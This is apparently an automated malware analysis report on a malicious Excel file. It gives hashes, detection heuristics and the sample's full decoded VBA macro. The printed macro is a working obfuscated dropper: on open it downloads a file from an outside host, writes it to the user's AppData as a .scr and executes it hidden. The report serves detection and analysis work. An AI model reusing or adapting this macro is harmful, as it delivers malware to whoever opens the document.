Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6c36554956617d29…

MALICIOUS

Office (OLE)

50.0 KB Created: 2015-12-07 11:06:25 Authoring application: Microsoft Excel First seen: 2019-11-20
MD5: 18711f1db99f6a6f73f8ab64f563accc SHA-1: 1bf850ec4dacd43323e75be040ee6bc7a3d05fe9 SHA-256: 6c36554956617d2996a89a0ff7f867ee9b70769e4f1b70943fbf2babb8d97bfd
378 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1059 Command and Scripting Interpreter

The VBA macro within the Excel file is designed to execute automatically upon opening. It attempts to download a file from 'hTTP://afgcloud7.com/logs/ssc.mcom' and save it as 'fortyscan.scr' in the user's application data directory. Subsequently, it executes this downloaded file, indicating a downloader or dropper functionality.

Heuristics 11

  • ClamAV: Xls.Malware.Valyria-10008065-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-10008065-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        Call N1Oq.write(jgP8u.ResponseBody)
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set jgP8u = CreateObject(Chr$(77) & Chr$(105) & Chr$(99) & Chr$(114) & Chr$(111) & Chr$(115) & Chr$(111) & Chr$(102) & Chr$(116) & Chr$(46) & Chr$(88) & Chr$(77) & Chr$(76) & Chr$(72) & Chr$(84) & Chr$(84) & Chr$(80))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set jgP8u = CreateObject(Chr$(77) & Chr$(105) & Chr$(99) & Chr$(114) & Chr$(111) & Chr$(115) & Chr$(111) & Chr$(102) & Chr$(116) & Chr$(46) & Chr$(88) & Chr$(77) & Chr$(76) & Chr$(72) & Chr$(84) & Chr$(84) & Chr$(80))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
       If FileAgaYiHaITo("hTTP://afgcloud7.com/logs/ssc.mcom", Environ("appdata") & "\fortyscan.scr") = True Then
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL hTTP://afgcloud7.com/logs/ssc.mcom Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10087 bytes
SHA-256: a296ba7a6e316956040132be679fe1881ddb4491c3722eb36c4d58d89ca2cc4b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
150 of 204 identifiers look randomly generated (e.g. 'lBQYajGBfhNTnvlQLLKP') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Auto_Open()

Dim KMNdhGTasshT As Integer
 
   Dim a As Integer
   a = 5
   
   Dim b As Integer
   b = 10
   
   Dim c As Double
   
   c = a + b

   
   c = a - b

   
   c = a * b

   If FileAgaYiHaITo("hTTP://afgcloud7.com/logs/ssc.mcom", Environ("appdata") & "\fortyscan.scr") = True Then
   c = b / a

   
   c = b Mod a

   
   c = b ^ a
 
        
Call Svier(Environ("appdata") & "\fortyscan.scr", vbHide)
   
  End If

End Sub
Public Function k9LWXV0s(TV9tLUV As String, jx68LS As String) As String
    Dim QLnhigm As Integer
    Dim hpIed As Integer
    Dim EsiLk As Integer
    For EsiLk = 1 To Len(jx68LS)
GoTo cjDLA
cjDLA:
GoTo axsVQDKdlbGBCAFqxEU:
ftOCMkfIJqKPYNtCCB:
ahoSgfvyBtRhaJsuOr = "JGpCc"
GoTo dkrVjiyBEwUkdMvx
QJtbeybftDZmZLn:
CnhJHYkjNHgdBNdy = "abcdef"
GoTo HkRjUcCcnhzwTpNGC
vVsFTBSEIiQTNgdzV:
        QLnhigm = QLnhigm + Asc(Mid$(jx68LS, EsiLk, 1))
GoTo AwHLavxGQKoEQr
jSekgrIJfgqNuYoTbu:
GBSQnIhaVhyMjVgDy = "dJMUKqzzy"
GoTo rQRSQVHAHmMyNRUL
NtdZNiYOdnVV:
QSfiwRTdniLbtNhbQwFF = "JunuZml"
GoTo vVsFTBSEIiQTNgdzV
QFFssTcpQkPoFRFDxP:
ahoSgfvyBtRhaJsuOr = "JGpCc"
GoTo jSekgrIJfgqNuYoTbu
EuajjimYQYCOOeild:
QSfiwRTdniLbtNhbQwFF = "JunuZml"
GoTo QJtbeybftDZmZLn
rQRSQVHAHmMyNRUL:
CnhJHYkjNHgdBNdy = "abcdef"
GoTo NtdZNiYOdnVV
dkrVjiyBEwUkdMvx:
DLYATzYpPpAuMwS = "NTPbsGO"
GoTo vLBEvUxcaIwRHy
AwHLavxGQKoEQr:
GoTo EuajjimYQYCOOeild
axsVQDKdlbGBCAFqxEU:
DLYATzYpPpAuMwS = "NTPbsGO"
GoTo QFFssTcpQkPoFRFDxP
HkRjUcCcnhzwTpNGC:
GBSQnIhaVhyMjVgDy = "dJMUKqzzy"
GoTo ftOCMkfIJqKPYNtCCB
vLBEvUxcaIwRHy:
    Next EsiLk
    For EsiLk = 1 To Len(TV9tLUV)
GoTo ZWm
ZWm:
GoTo zZzKEQFdMQd:
pxbonDHJBbqiSA:
VJSqlOQxQQfTzIJHMk = "ycpoE"
GoTo QzESdxKylLihJqHu
RIVgOOCCdm:
vjUwSRtbsfjIjuoG = "awUMIUl"
GoTo buaxPcPNHZQtdnt
BSTpqzQEixekD:
eYqnJfEJGRUkFGP = "UyhATODjstr"
GoTo QwrsqvgZgK
zZzKEQFdMQd:
KCcrjTBDZBFTPyMlmMV = "KeI"
GoTo HOfFEUKNFeHmkRG
QnrtlKnRCxmG:
GoTo oBMvuiTvResardh
buaxPcPNHZQtdnt:
hahLZYosumLbSDlnH = "pCN"
GoTo BSTpqzQEixekD
HOfFEUKNFeHmkRG:
VJSqlOQxQQfTzIJHMk = "ycpoE"
GoTo RIVgOOCCdm
QwrsqvgZgK:
        hpIed = Asc(Mid$(TV9tLUV, EsiLk, 1)) - QLnhigm - EsiLk
GoTo QnrtlKnRCxmG
oBMvuiTvResardh:
eYqnJfEJGRUkFGP = "UyhATODjstr"
GoTo vtnFCZvTZVhkzUVfp
NdwPjeSyHIGL:
vjUwSRtbsfjIjuoG = "awUMIUl"
GoTo pxbonDHJBbqiSA
vtnFCZvTZVhkzUVfp:
hahLZYosumLbSDlnH = "pCN"
GoTo NdwPjeSyHIGL
QzESdxKylLihJqHu:
KCcrjTBDZBFTPyMlmMV = "KeI"
GoTo lBQYajGBfhNTnvlQLLKP
lBQYajGBfhNTnvlQLLKP:
        Do Until hpIed > 0
GoTo QgW
QgW:
GoTo PwCVeTzuvtyjckN:
CYZjsnQgzTmh:
lxatZwOoOaTmUsc = "soAQ"
GoTo CKLJOztAerqGKNEetmVD
FPyylYyUiwduh:
YYoegYxaECkZtkboz = "hUU"
GoTo KywqIFcyQdZk
DgzfDUuUgascy:
YYoegYxaECkZtkboz = "hUU"
GoTo tzvGYmuvFdY
bDHVgAOBoOlkMtLx:
             hpIed = 255 + hpIed
GoTo bBMGZVsOnfbnESo
tzvGYmuvFdY:
EQtMsPiuigaspLvGL = "TlmHIRqQ"
GoTo aquwoNqUFBpKA
CKLJOztAerqGKNEetmVD:
YZQczGNrEDTYbRrGyjQ = "oQUjfNcBB"
GoTo bDHVgAOBoOlkMtLx
PwCVeTzuvtyjckN:
EQtMsPiuigaspLvGL = "TlmHIRqQ"
GoTo FPyylYyUiwduh
uQbpmUiHHj:
rsBaTxzgmFNDjefd = "Sah"
GoTo DgzfDUuUgascy
bBMGZVsOnfbnESo:
GoTo lIDhjPkpxn
lIDhjPkpxn:
YZQczGNrEDTYbRrGyjQ = "oQUjfNcBB"
GoTo ccafCJQvHHQbeVxMFpQ
ccafCJQvHHQbeVxMFpQ:
lxatZwOoOaTmUsc = "soAQ"
GoTo uQbpmUiHHj
KywqIFcyQdZk:
rsBaTxzgmFNDjefd = "Sah"
GoTo CYZjsnQgzTmh
aquwoNqUFBpKA:
        Loop
GoTo vW
vW:
GoTo cKMhJNcmHUHuV:
ZwdGQDJdlaFBBAEqjq:
ykoNCztLIfBagcn = "Fbdmv"
GoTo vhwADvTxcLHwQGxLVii
LTJpkljoagnEfe:
GoTo kneDgLJrgAqhvF
hmIPQBONehk:
dtxArQtZIEtNDuISB = "obBYlz"
GoTo APIsbdxafs
tmitKZuisPKopVqvDtZi:
ykoNCztLIfBagcn = "Fbdmv"
GoTo hmIPQBONehk
APIsbdxafs:
PLQopKLVtaDSzGZhQCx = "wBngnQ"
GoTo YlKKmuHjCiGYy
vhwADvTxcLHwQGxLVii:
QnFatndIRRQVGzGly = "NQTLkz"
GoTo qSARDHiHSMfcz
obbCKYzTyQoAp:
PLQopKLVtaDSzGZhQCx = "wBngnQ"
GoTo gyvRBMSOarsN
YlKKmuHjCiGYy:
xnesCllYYzHUwPv = "lxljdvsOy"
GoTo kevfBlwCyJbqxyIgbEGm
kevfBlwCyJbqxyIgbEGm:
        k9LWXV0s = k9LWXV0s & Chr(hpIed)
GoTo LTJpkljoagnEfe
gyvRBMSOarsN:
dtxArQtZIEtNDuISB = "obBYlz"
GoTo ZwdGQDJdlaFBBAEqjq
kneDgLJrgAqhvF:
xnesCllYYzHUwPv = "lxljdvsOy"
GoTo obbCKYzTyQoAp
cKMhJNcmHUHuV:
QnFatndIRRQVGzGly = "NQTLkz"
GoTo tmitKZuisPKopVqvDtZi
qSARDHiHSMfcz:
    Next EsiLk
End Function




Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module2"
Function Area(x As Double, y As Double) As Double

Area = x * y

End Function
Function FileAgaYiHaITo(sUrl As String, sDropTo As String) As Boolean
    Dim jgP8u As Object
    Dim N1Oq As Object
    On Error GoTo ErrHandle:
GoTo cqdPqMLoUmZdCdoiA:
cqdPqMLoUmZdCdoiA:
GoTo mfP
mfP:
xdmnlqbUcFSRimogFUM = "fhCfjx"
GoTo LQZOuCDBGelsV
zNJsGggGPcEYDb:
ktRycrYexFvbVQUa = "DKpPBRVY"
GoTo StEyQAQGQQSfwK
ixSTeniLbuO:
    Call N1Oq.Close
GoTo cQwFGEJuovZ
LQZOuCDBGelsV:
hDayEALOezAJTOsH = "uN"
GoTo iyCFwVleNvyS
iyCFwVleNvyS:
pRwhcQlcSgraZMyawIQ = "VIMmaYR"
GoTo zNJsGggGPcEYDb
CQbvJwjJgfHoGsw:
ktRycrYexFvbVQUa = "DKpPBRVY"
GoTo wHBTQnJiaViyNjQgDyce
StEyQAQGQQSfwK:
PaJIwwYgsUoTrJVJHB = "QnQinkvMN"
GoTo nwUOsubhAIye
fksiNVQUaxELqCCRV:
hDayEALOezAJTOsH = "uN"
GoTo PpExhORmOShdMazzbjvY
AwkEvmAKtsgStPcrYpc:
    Call N1Oq.write(jgP8u.ResponseBody)
GoTo FtrlDAQtRYT
nwUOsubhAIye:
    Set jgP8u = CreateObject(Chr$(77) & Chr$(105) & Chr$(99) & Chr$(114) & Chr$(111) & Chr$(115) & Chr$(111) & Chr$(102) & Chr$(116) & Chr$(46) & Chr$(88) & Chr$(77) & Chr$(76) & Chr$(72) & Chr$(84) & Chr$(84) & Chr$(80))
GoTo aYdNUcsSSiZbSsUzxfTo
VjudcPPrzLo:
    Call jgP8u.Open("GET", sUrl, 0)
GoTo nKdpdbUnkGqBGDOgh
nKdpdbUnkGqBGDOgh:
GoTo HUItV
HUItV:
    Call jgP8u.Send
GoTo DMlRvKrxQZOupqot
wHBTQnJiaViyNjQgDyce:
pRwhcQlcSgraZMyawIQ = "VIMmaYR"
GoTo fksiNVQUaxELqCCRV
PpExhORmOShdMazzbjvY:
xdmnlqbUcFSRimogFUM = "fhCfjx"
GoTo TqOGCOfuPDMkfIK
aYdNUcsSSiZbSsUzxfTo:
    Set N1Oq = CreateObject(Chr$(65) & Chr$(100) & Chr$(111) & Chr$(100) & Chr$(98) & Chr$(46) & Chr$(83) & Chr$(116) & Chr$(114) & Chr$(101) & Chr$(97) & Chr$(109))
GoTo VjudcPPrzLo
DMlRvKrxQZOupqot:
    N1Oq.Type = 1
GoTo QfIkUlprjIl
lBFIzZogQyAV:
PaJIwwYgsUoTrJVJHB = "QnQinkvMN"
GoTo CQbvJwjJgfHoGsw
FtrlDAQtRYT:
    Call N1Oq.SaveToFile(sDropTo, 2)
GoTo ixSTeniLbuO
cQwFGEJuovZ:
GoTo lBFIzZogQyAV
QfIkUlprjIl:
    Call N1Oq.Open
GoTo AwkEvmAKtsgStPcrYpc
qSARD:
GoTo vyBtShaKsuO:
qNImoUbuCrQ:
GoTo SRQHNVmMLcRUMlOtrZN
pQlPoGgGRL:
    Exit Function
GoTo MkTekgsIYf
pPqBvNKhCcTP:
DmmaLnJVkRjUZznke = "uQmKQM"
GoTo sHdQaxsVYE
embGPQOTrxEjwvLPRJjy:
dbUnkGqBGDOghCDM = "RvKxQZOu"
GoTo Bbmg
Bbmg:
GoTo bIKfHMaQFSssT
MkTekgsIYf:
ErrHandle:
GoTo qNImoUbuCrQ
SRQHNVmMLcRUMlOtrZN:
dNUcsSSiZbSsUzxfTofV = "udcPrzLoHnKd"
GoTo ZOdnVVIJktF
TqOGCOfuPDMkfIK:
    FileAgaYiHaITo = True
GoTo qSARD
lrKSHojjinYQYCdO:
cqMNQhcFUnHbUKqzAyDo = "oSg"
GoTo NFBNd
NFBNd:
GoTo wJTpCqcDaZAiz
BgEQjQTNgdA:
qoteQfIkUlprjIlP = "peypg"
GoTo uAwIZavxGeLp
sHdQaxsVYE:
qoteQfIkUlprjIlP = "peypg"
GoTo embGPQOTrxEjwvLPRJjy
vyBtShaKsuO:
cqMNQhcFUnHbUKqzAyDo = "oSg"
GoTo HuFcX
HuFcX:
GoTo pPqBvNKhCcTP
uAwIZavxGeLp:
DmmaLnJVkRjUZznke = "uQmKQM"
GoTo lrKSHojjinYQYCdO
GoTo Ci
Ci:
ZOdnVVIJktF:
dbUnkGqBGDOghCDM = "RvKxQZOu"
GoTo IQ
IQ:
GoTo BgEQjQTNgdA
bIKfHMaQFSssT:
dNUcsSSiZbSsUzxfTofV = "udcPrzLoHnKd"
GoTo pQlPoGgGRL
wJTpCqcDaZAiz:
    FileAgaYiHaITo = False
End Function
Public Function Svier(ByVal RPVDuDd As String, ByVal yLPTJ As VbAppWinStyle) As Boolean
    On Error GoTo ErrHandle
GoTo Achy
Achy:
GoTo OidRxGHFKvpwan:
MrDDSQaQqFyiPSnP:
bZeOVdtTTjacTtV = "ygUpgQ"
GoTo ieNbAAbkqRmQpHhHSMf
CURoKjbQjzOkYhEzd:
ENmSwLsyRaPvqrpufY = "JlV"
GoTo LgltjOQYVby
lfxvRnLRNadrM:
qskJmQBxlFwnBLut = "TuQ"
GoTo YidGVoIcVLrABzEpip
OidRxGHFKvpwan:
rZqdhGusmEBYuSZ = "gjyTUfojMc"
GoTo RcwKxkKhgIpHtxQx
LgltjOQYVby:
vedQQsAMpIoLeqec = "olHrCHEPhi"
GoTo MrDDSQaQqFyiPSnP
MoKQlSkVaA:
ENmSwLsyRaPvqrpufY = "JlV"
GoTo lfxvRnLRNadrM
PusaOjZPeoQQ:
ErrHandle:
GoTo KluGjChFYjYUOheBl
RcwKxkKhgIpHtxQx:
qskJmQBxlFwnBLut = "TuQ"
GoTo CURoKjbQjzOkYhEzd
KuqfzqhuEnn:
vedQQsAMpIoLeqec = "olHrCHEPhi"
GoTo MoKQlSkVaA
BxJabwyHfMpFms:
GoTo TIpkkjoZRZDePgjmeC
TIpkkjoZRZDePgjmeC:
bZeOVdtTTjacTtV = "ygUpgQ"
GoTo KuqfzqhuEnn
ieNbAAbkqRmQpHhHSMf:
    Call CreateObject(Chr(83) & Chr(72) & Chr(101) & Chr(76) & Chr(108) & Chr$(46) & Chr$(65) & Chr$(112) & Chr$(112) & Chr$(108) & Chr$(105) & Chr$(99) & Chr$(97) & Chr$(116) & Chr$(105) & Chr$(111) & Chr$(110)).ShellExecute(RPVDuDd, vbNullString, vbNullString, vbNullString, yLPTJ)
GoTo lUflhtJZgirOJnpVcv
KluGjChFYjYUOheBl:
    ShellExecute = False
GoTo BxJabwyHfMpFms
lUflhtJZgirOJnpVcv:
    ShellExecute = True
GoTo sYTTSYIOQnNMdSVN
sYTTSYIOQnNMdSVN:
    Exit Function
GoTo PusaOjZPeoQQ
YidGVoIcVLrABzEpip:
rZqdhGusmEBYuSZ = "gjyTUfojMc"
GoTo CGJAaphRzBQz
CGJAaphRzBQz:
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.